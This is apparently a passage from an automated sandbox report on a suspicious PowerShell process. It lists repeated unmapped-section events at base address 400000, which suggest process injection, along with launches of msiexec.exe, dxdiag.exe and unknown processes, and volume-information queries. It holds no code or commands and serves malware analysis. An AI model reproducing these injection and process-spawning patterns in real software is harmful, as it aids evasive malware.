Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
